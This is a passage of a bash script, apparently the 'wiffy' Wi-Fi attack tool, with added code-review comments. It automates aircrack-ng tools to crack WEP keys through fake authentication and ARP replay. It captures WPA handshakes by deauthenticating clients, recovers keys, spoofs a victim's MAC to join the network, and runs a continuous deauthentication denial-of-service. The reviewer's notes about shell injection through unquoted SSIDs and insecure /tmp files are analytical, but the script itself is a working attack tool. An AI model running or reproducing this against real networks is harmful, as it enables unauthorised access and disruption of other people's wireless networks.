  515. command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')
  516. if [ "$command" == "$monitorInterface" ] ; then
  517. action "Monitor Mode (Stopping)" "airmon-ng stop $monitorInterface" $verbose $diagnostics "true"
  518. sleep 1
  519. fi
  520.  
  521. action "Monitor Mode (Starting)" "airmon-ng start $interface | awk '/monitor mode enabled on/ {print \$5}' | tr -d '\011' | sed -e \"s/(monitor mode enabled on //\" | sed 's/\(.*\)./\1/' > /tmp/wiffy.tmp" $verbose $diagnostics "true"
  522. command=$(cat /tmp/wiffy.tmp)
  523. if [ "$monitorInterface" != "$command" ] ; then
  524. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then
  525. display info "Configuring: Chaning monitorInterface to: $command" $diagnostics
  526. fi
  527. monitorInterface=$command
  528. fi
  529.  
  530. command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')
  531. if [ "$command" != "$monitorInterface" ] ; then
  532. sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!
  533. command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')
  534. if [ "$command" != "$monitorInterface" ] ; then
  535. display error "The monitor interface $monitorInterface, isn't correct." $diagnostics 1>&2
  536. if [ "$debug" == "true" ] ; then iwconfig; fi
  537. cleanup
  538. fi
  539. fi
  540.  
  541. #----------------------------------------------------------------------------------------------#
  542. if [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then
  543. display diag "Testing: Wireless Injection" $diagnostics
  544. command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)
  545. if [ "$diagnostics" == "true" ] ; then echo -e $command >> $logFile ; fi
  546. if [ -z "$(echo \"$command\" | grep 'Injection is working')" ] ; then display error "$monitorInterface doesn't support packet injecting." $diagnostics 1>&2
  547. elif [ -z "$(echo \"$command\" | grep 'Found 0 APs')" ] ; then display error "Couldn't test packet injection" $diagnostics 1>&2 ;
  548. fi
  549. fi
  550.  
  551. #----------------------------------------------------------------------------------------------#
  552. if [ "$macMode" != "false" ] ; then
  553. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Configuring: MAC address" $diagnostics ; fi
  554. command="ifconfig $monitorInterface down &&"
  555. if [ "$macMode" == "random" ] ; then command="$command macchanger -A $monitorInterface &&"; fi
  556. if [ "$macMode" == "set" ] ; then command="$command macchanger -m $fakeMac $monitorInterface &&"; fi
  557. command="$command ifconfig $monitorInterface up"
  558. action "Configuring: MAC address" "$command" $verbose $diagnostics "true"
  559. sleep 2
  560. mac="$fakeMac"
  561. fi
  562.  
  563. #----------------------------------------------------------------------------------------------#
  # Main dispatch on $mode ("crack" or "dos"; see the Defaults block at the top of the file).
  # Everything here is top-level script code, not a function: $mode, $client, $encryption,
  # $bssid, $channel, $essid, $mac, $fakeMac, $monitorInterface, $interface, $wordlist,
  # $verbose, $diagnostics, $debug and $logFile are set earlier in the file, and the helpers
  # display, action, findClient and cleanup are defined outside this view.
  # NOTE(review): almost every expansion below is unquoted and is spliced into a command
  # string that `action` executes; values that come from the air (notably $essid) are
  # therefore treated as trusted shell text — see the per-line notes on L656/L658/L674.
  564. if [ "$mode" == "crack" ] ; then
  # Only look for a client when the caller did not supply one.
  565. if [ -z "$client" ] ; then
  566. display action "Detecting: Client(s)" $diagnostics
  # findClient is defined elsewhere in the file; presumably it sets $client — TODO confirm.
  567. findClient $encryption
  568. fi
  569.  
  570. #----------------------------------------------------------------------------------------------#
  571. display action "Starting: airodump-ng" $diagnostics
  # NOTE(review): the working files live under a fixed, predictable name in the shared /tmp
  # directory (/tmp/wiffy*). A pre-existing file or symlink of that name placed by another
  # local user is deleted/overwritten here; mktemp -d would avoid that.
  572. action "Removing temp files" "rm -f /tmp/wiffy* && sleep 1" $verbose $diagnostics "true"
  # Capture runs in the background for the rest of the "crack" branch. The last argument
  # ("0|0|13") is passed through to `action`; its meaning is not visible in this part of the file.
  573. action "airodump-ng" "airodump-ng --bssid $bssid --channel $channel --write /tmp/wiffy --output-format cap $monitorInterface" $verbose $diagnostics "true" "0|0|13" & # Don't wait, do the next command
  574. sleep 1
  575.  
  576. #----------------------------------------------------------------------------------------------#
  # WEP path. Note that success of each aireplay-ng step is never checked; the script relies
  # on fixed sleeps and on the aircrack-ng run further down.
  577. if [ "$encryption" == "WEP" ] ; then
  578. if [ "$client" == "clientless" ] ; then
  579. display action "Attack (FakeAuth): $fakeMac" $diagnostics
  # NOTE(review): this line authenticates with $mac, the commented alternative on the next
  # line and the later calls on L589/L591 use $fakeMac. Which address is intended is not
  # clear from here; the displayed message above names $fakeMac.
  580. action "aireplay-ng (fakeauth)" "aireplay-ng --fakeauth 0 -e \"$essid\" -a $bssid -h $mac $monitorInterface" $verbose $diagnostics "true"
  581. #action "aireplay-ng (fakeauth)" "aireplay-ng --fakeauth 30 -o 1 -q 10 -e \"$essid\" -a $bssid -h $fakeMac $monitorInterface" $verbose $diagnostics "true"
  # The intended success check below was never implemented: $client is set unconditionally.
  582. #if [Association successful] = then
  583. client=$mac
  584. sleep 1
  585. fi
  586. display action "Attack (ARPReplay+Deauth): $client" $diagnostics
  587. action "aireplay-ng (arpreplay)" "aireplay-ng --arpreplay -e \"$essid\" -b $bssid -h $client $monitorInterface" $verbose $diagnostics "true" "0|195|10" & # Don't wait, do the next command
  588. sleep 1
  589. action "aireplay-ng (deauth)" "aireplay-ng --deauth 5 -e \"$essid\" -a $bssid -c $fakeMac $monitorInterface" $verbose $diagnostics "true"
  590. sleep 1
  # Re-authenticate after a delay when we are acting as our own client (clientless case above).
  591. if [ "$client" == "$mac" ] ; then sleep 20 && action "aireplay-ng (fakeauth)" "aireplay-ng --fakeauth 0 -e \"$essid\" -a $bssid -h $fakeMac $monitorInterface" $verbose $diagnostics "true" ; fi
  # Fixed wait; there is no check that the background capture has collected anything.
  592. sleep 60
  593.  
  594. #----------------------------------------------------------------------------------------------#
  # WPA path: poll the capture until aircrack-ng indicates a usable handshake is present.
  595. elif [ "$encryption" == "WPA" ] ; then
  596. display action "Capturing: Handshake" $diagnostics
  597. loop="0" # 0 = first, 1 = client, 2 = everyone
  # A one-word dummy wordlist. It appears to be used only so that aircrack-ng prints
  # "Passphrase not in dictionary" (grepped below) once a handshake exists in the capture —
  # the author's note on L601 lists the other messages aircrack-ng prints when it does not.
  598. echo "g0tmi1k" > /tmp/wiffy.tmp
  599. for (( ; ; )) ; do
  600. action "aircrack-ng" "aircrack-ng /tmp/wiffy*.cap -w /tmp/wiffy.tmp -e \"$essid\" > /tmp/wiffy.handshake" $verbose $diagnostics "true"
  # NOTE(review): the variable is named `command`, same as the shell builtin; harmless
  # (separate namespaces) but confusing. `grep -q … /tmp/wiffy.handshake` would avoid the cat.
  601. command=$(cat /tmp/wiffy.handshake | grep "Passphrase not in dictionary" ) #Got no data packets from client network & No valid WPA handshakes found
  602. if [ "$command" ] ; then break; fi
  603. sleep 2
  # Alternate between targeting the selected client (loop=1) and everyone (loop=2);
  # from the third pass on, findClient is re-run before each targeted attempt.
  604. if [ "$loop" != "1" ] ; then
  605. if [ "$loop" != "0" ] ; then findClient $encryption ; fi
  606. sleep 1
  607. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Attack (Deauth): $client" $diagnostics ; fi
  # BUG(review): the interface is hard-coded as mon0 here and on L612, while every other
  # aireplay-ng/airodump-ng call in this block uses $monitorInterface (L573, L580, L587, L589,
  # L591). If airmon-ng created an interface with a different name, these two calls target
  # the wrong device.
  608. action "aireplay-ng" "aireplay-ng --deauth 5 -a $bssid -c $client mon0" $verbose $diagnostics "true"
  609. loop="1"
  610. else
  611. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Attack (Deauth): *everyone*" $diagnostics ; fi
  612. action "aireplay-ng" "aireplay-ng --deauth 5 -a $bssid mon0" $verbose $diagnostics "true"
  613. loop="2"
  614. fi
  615. sleep 1
  616. done
  # NOTE(review): the "verbose or diagnostics or debug" gate is copy-pasted on L607, L611,
  # L617, L639 and L651; a small helper would keep them in sync.
  617. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Captured: Handshake" $diagnostics ; fi
  # NOTE(review): `killall xterm` terminates every xterm on the host, including ones this
  # script did not start. Tracking the PIDs of the backgrounded actions and killing only
  # those would be the safer shape.
  618. action "Killing programs" "killall xterm && sleep 1" $verbose $diagnostics "true"
  619. fi
  620.  
  621. #----------------------------------------------------------------------------------------------#
  # Offline key recovery against the capture. The result, if any, is written to /tmp/wiffy.key
  # by aircrack-ng's -l option (see the -e check on L633).
  622. if [ "$encryption" == "WEP" ] || [ "$encryption" == "WPA" ] ; then
  623. display action "Starting: aircrack-ng" $diagnostics
  # The fourth `action` argument is "false" here and "true" everywhere else in this block;
  # presumably it controls whether the command is detached — TODO confirm against `action`.
  624. if [ "$encryption" == "WEP" ] ; then action "aircrack-ng" "aircrack-ng /tmp/wiffy*.cap -e \"$essid\" -l /tmp/wiffy.key" $verbose $diagnostics "false" "0|350|30" ; fi
  # $wordlist is the path from the Defaults block; it is not checked for existence here.
  625. if [ "$encryption" == "WPA" ] ; then action "aircrack-ng" "aircrack-ng /tmp/wiffy*.cap -w $wordlist -e \"$essid\" -l /tmp/wiffy.key" $verbose $diagnostics "false" "0|0|20" ; fi
  626. fi
  627.  
  628. #----------------------------------------------------------------------------------------------#
  # Tear down: same host-wide killall caveat as on L618.
  629. action "Killing programs" "killall xterm && sleep 1" $verbose $diagnostics "true"
  630. action "airmon-ng" "airmon-ng stop $monitorInterface" $verbose $diagnostics "true"
  631.  
  632. #----------------------------------------------------------------------------------------------#
  # Outcome handling: key file present → report (and optionally join); WPA without key file →
  # keep the handshake; anything else with a known encryption type → generic error.
  633. if [ -e "/tmp/wiffy.key" ] ; then
  # NOTE(review): the recovered key sits in a predictable file under /tmp, and for WPA the
  # PSK is also written to /tmp/wiffy.conf on L646. Whether `cleanup` (defined elsewhere)
  # removes these is not visible here — TODO confirm; consider a private directory and shred.
  634. key=$(cat /tmp/wiffy.key)
  635. display info "WiFi key: $key" $diagnostics
  636. #----------------------------------------------------------------------------------------------#
  637. if [ "$extras" == "true" ] ; then
  # If the address in use is not already the selected client's, clone it before joining
  # (author's stated reason: MAC filtering on the AP).
  638. if [ "$client" != "$mac" ] ; then
  639. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Attack (Spoofing): $client ('Helps' with MAC filtering) " $diagnostics ; fi
  # The label says "airmon-ng" but the command is ifconfig/macchanger; label is cosmetic only.
  640. action "airmon-ng" "ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up" $verbose $diagnostics "true"
  641. fi
  642. display action "Joining: $essid" $diagnostics
  643. if [ "$encryption" == "WEP" ] ; then
  # SECURITY(review): $essid and $key are spliced unquoted into a command string that
  # `action` runs. An SSID containing spaces or shell metacharacters (SSIDs are attacker-
  # controlled, broadcast data) is word-split and interpreted by the shell on the operator's
  # machine. Earlier calls at least wrap it as \"$essid\"; this line and L646 do not.
  644. action "i[f/w]config" "ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up" $verbose $diagnostics "true"
  645. elif [ "$encryption" == "WPA" ] ; then
  # SECURITY(review): same issue as L644 — $key is single-quoted but $essid is bare.
  # The generated config contains the PSK in the shared /tmp directory.
  646. action "wpa_passphrase" "wpa_passphrase $essid '$key' > /tmp/wiffy.conf" $verbose $diagnostics "true"
  647. action "wpa_supplicant" "wpa_supplicant -B -i $interface -c /tmp/wiffy.conf -D wext" $verbose $diagnostics "true"
  648. fi
  649. sleep 5
  650. action "dhclient" "dhclient $interface" $verbose $diagnostics "true"
  651. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then
  # Parses the legacy "inet addr:" line of net-tools ifconfig; newer ifconfig/ip output
  # uses a different format, so this may print nothing there — TODO confirm on the target OS.
  652. ourIP=$(ifconfig $interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}')
  653. display info "IP: $ourIP" $diagnostics
  654. #gateway=$(route -n | grep $interface | awk '/^0.0.0.0/ {getline; print $2}')
  655. #display info "Gateway: $gateway" $diagnostics
  656. fi
  657. fi
  658. #----------------------------------------------------------------------------------------------#
  659. elif [ "$encryption" == "WPA" ] ; then
  660. display error "WiFi Key not in wordlist" $diagnostics 1>&2
  661. display action "Moving handshake: $(pwd)/wiffy-$essid.cap" $diagnostics 1>&2
  # NOTE(review): the SSID becomes part of the destination filename unquoted; an SSID with
  # spaces or "/" breaks the mv or redirects the file. Also, if more than one /tmp/wiffy*.cap
  # exists the glob expands to several sources and mv fails ("target is not a directory").
  662. action "Moving capture" "mv -f /tmp/wiffy*.cap $(pwd)/wiffy-$essid.cap" $verbose $diagnostics "true"
  663. #----------------------------------------------------------------------------------------------#
  664. elif [ "$encryption" != "N/A" ] ; then
  665. display error "Something went wrong )=" $diagnostics 1>&2
  666. fi
  667.  
  668.  
  669. #----------------------------------------------------------------------------------------------#
  # "dos" mode: a single backgrounded aireplay-ng, then the script idles until interrupted.
  670. elif [ "$mode" == "dos" ] ; then
  671. display action "Attack (DOS): $essid" $diagnostics
  # The command line is built incrementally in $command; "-c $client" is appended only when a
  # specific client was selected, then the interface is added last.
  672. command="aireplay-ng --deauth 0 -e \"$essid\" -a $bssid"
  673. if [ "$client" != "clientless" ] ; then command="$command -c $client" ; fi
  674. command="$command $monitorInterface"
  675. action "aireplay-ng (DeAuth)" "$command" $verbose $diagnostics "true" &
  676.  
  677. #----------------------------------------------------------------------------------------------#
  678. display info "Attacking! ...press CTRL+C to stop" $diagnostics
  679. if [ "$diagnostics" == "true" ] ; then echo "-Ready!----------------------------------" >> $logFile ; fi
  # Idle forever; the only way out is a signal. Whether a trap routes that to `cleanup`
  # is not visible in this part of the file — TODO confirm, otherwise the background
  # aireplay-ng and the monitor interface are left running.
  680. for (( ; ; )) ; do
  681. sleep 5
  682. done
  # Unfinished "inject" mode, kept commented out by the author.
  683. #elif [ "$mode" == "inject" ] ; then
  684. # display action "Attack (Inject): $essid" $diagnostics
  685. # if [ "$encryption" != "WEP" ] ; then display error "Only works on WEP networks" $diagnostics 1>&2 ; cleanup ; fi
  686.  
  687. #action "aireplay-ng (Inject)" "airtun-ng -a $bssid $monitorInterface" $verbose $diagnostics "true" &
  688. #action "aireplay-ng (Inject)" "ifconfig at0 192.168.1.83 netmask 255.255.255.0 up" $verbose $diagnostics "true" &
  689.  
  690. # airmon-ng start wlan0
  691. # /pentest/wireless/airpwn-1.4/airpwn -c conf/greet_html -d rt73 -i mon0 -v
  692.  
  693. #----------------------------------------------------------------------------------------------#
  694. # display info "Attacking! ...press CTRL+C to stop" $diagnostics
  695. # if [ "$diagnostics" == "true" ] ; then echo "-Ready!----------------------------------" >> $logFile ; fi
  696. # for (( ; ; )) ; do
  697. # sleep 5
  698. # done
  # No else branch: an unrecognised $mode falls through silently to the cleanup below.
  699. fi
  700.  
  701. #----------------------------------------------------------------------------------------------#
  # End-of-run marker in the diagnostics log, then the shared cleanup routine (defined
  # elsewhere; the "clean" argument's effect is not visible here).
  702. if [ "$diagnostics" == "true" ] ; then echo "-Done!---------------------------------------------------------------------------------------" >> $logFile ; fi
  703. cleanup clean
  704.  
  705.  
  706. #---Ideas--------------------------------------------------------------------------------------#
  707. # WEP - Chopchop/FagmentationAP Packet Broadcast
  708. # WPA - aircrack/coWPAtty
  709. # WPA - brute / hash
  710. # WPA - calculate hash
  711. # WPA - use pre hash / use pre capture
  712. # WPA - use folder for wordlist
  713. # WiFi Key is in hex
  714. # update - aircrack/coWPATTY
  715. # decrypt packets - offline & online (airtun-ng)
  716. # Mode - Injection - GET WORKING
  717. # display error "The encryption ($encryption) on $essid isn't support" $diagnostics 1>&2 ; cleanup